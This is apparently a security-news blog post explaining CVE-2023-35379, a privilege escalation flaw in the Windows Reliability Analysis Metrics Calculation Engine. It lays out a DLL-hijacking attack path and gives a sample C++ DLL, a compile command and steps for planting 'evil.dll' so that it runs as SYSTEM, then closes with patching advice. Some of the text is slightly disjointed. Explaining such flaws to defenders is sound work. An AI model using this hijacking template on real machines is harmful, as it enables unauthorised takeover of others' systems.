CVE CyberSecurity Database News

CVE-2023-35379 - Exploiting the Reliability Analysis Metrics Calculation Engine (RACEng) Elevation of Privilege Vulnerability

Poster -

The world of Windows security is always abuzz with the discovery of new vulnerabilities. In 2023, a fresh vulnerability was discovered in the Reliability Analysis Metrics Calculation Engine (RACEng), registered as CVE-2023-35379. This elevation of privilege (EoP) bug, if left unpatched, could let attackers gain higher system privileges and potentially take over affected machines. In this exclusive post, we’ll break down what the vulnerability is, how it works, show you sample code, share official references, and explain how attackers can actually exploit this dangerous bug — all in plain, simple language.

What Is the Reliability Analysis Metrics Calculation Engine (RACEng)?

RACEng, short for Reliability Analysis Metrics Calculation Engine, is part of Windows’ Reliability Analysis Component (RAC). This background service collects data about events that affect system reliability, such as application crashes, hardware failures, or system hangs. It's used to populate the "Reliability Monitor" in Windows.

Normally, RACEng runs as a service under SYSTEM permissions, making it a tempting target for escalation attacks.

What is CVE-2023-35379?

According to Microsoft, CVE-2023-35379 is a privilege escalation vulnerability in Microsoft Windows. The problem stems from how RACEng improperly handles certain operations which can be manipulated by an attacker to execute code as SYSTEM.

In simple words: If you’re running on a vulnerable version of Windows, an attacker with regular user (non-admin) access could run code that gives them full control over the computer — all because of how RACEng works behind the scenes.

Official References

- Microsoft Advisory: CVE-2023-35379
- NVD Entry: NVD CVE-2023-35379

How Does the Exploit Work?

The bug in RACEng is typically triggered by manipulating how it loads dynamic-link libraries (DLLs), or by exploiting insecure permissions on certain files or named pipes it uses.

Attack Scenario

1. The attacker needs to have the ability to run code on the target machine. (Often this is a limited or basic user account.)

The attacker plants a malicious DLL (or otherwise manipulates a component RACEng will use).

3. RACEng, running as SYSTEM, loads or accesses the attacker's file, inadvertently running code with SYSTEM privileges.

A Typical Attack Path

Step 1: Leverage Unsecure File/Folder Permissions

In some situations, the service might load files or DLLs from a directory writable by normal users, or accept unsanitized input via a named pipe.

Step 2: Planting Malicious Code

The attacker places their own code (DLL or executable) in that location. For DLL hijacking, the attacker renames their payload to match a DLL RACEng attempts to load, and ensures it's in the search path.

Step 3: Triggering Execution

The attacker restarts the RACEng service (sometimes this can be done by logging off/on, or using available permissions), which then loads the attacker's code using SYSTEM privileges.

A simplified code example (DLL for DLL hijacking)

// MaliciousDll.cpp
#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
{
    if(ul_reason_for_call == DLL_PROCESS_ATTACH) {
        // Perform malicious action: spawn SYSTEM shell, drop a file, etc.
        system("cmd.exe /c echo SYSTEM OWNZ > C:\\pwned.txt");
    }
    return TRUE;
}

Compile: Use Visual Studio or MinGW g++ -shared -o evil.dll MaliciousDll.cpp

Next, drop evil.dll in the target’s RACEng search path (one with user write permissions). When the service runs, your code executes as SYSTEM!

Set up persistent backdoors

All without the user knowing, since attacks happen in the background. This is why Microsoft marked it as important with a high base CVSS score.

How to Protect Yourself

- Apply Microsoft Updates: Always keep your Windows operating system up-to-date. The patch for this bug was distributed in the August-September 2023 Patch Tuesday updates.

Restrict Local User Permissions: Limit local account privileges wherever possible.

- Monitor for Suspicious DLLs and Service Behavior: Use endpoint detection tools to watch for unauthorized DLLs or abnormal service restarts.

Conclusion

CVE-2023-35379 is a textbook example of why system services should be strictly locked down and why regular patching is so important. By exploiting something as seemingly “boring” as a reliability analysis service, attackers can gain the keys to the kingdom on your machine.

Recommendation: Patch ASAP, audit file/folder/service permissions, and pay attention to security bulletins — even for unglamorous services like RACEng.

Learn More

- Microsoft Security Response Center - CVE-2023-35379
- How Security Researchers Find EoP Bugs

Stay safe, keep your systems updated, and be aware: even small system components can hide big risks!

Timeline

Published on: 08/08/2023 18:15:00 UTC
Last modified on: 08/10/2023 18:22:00 UTC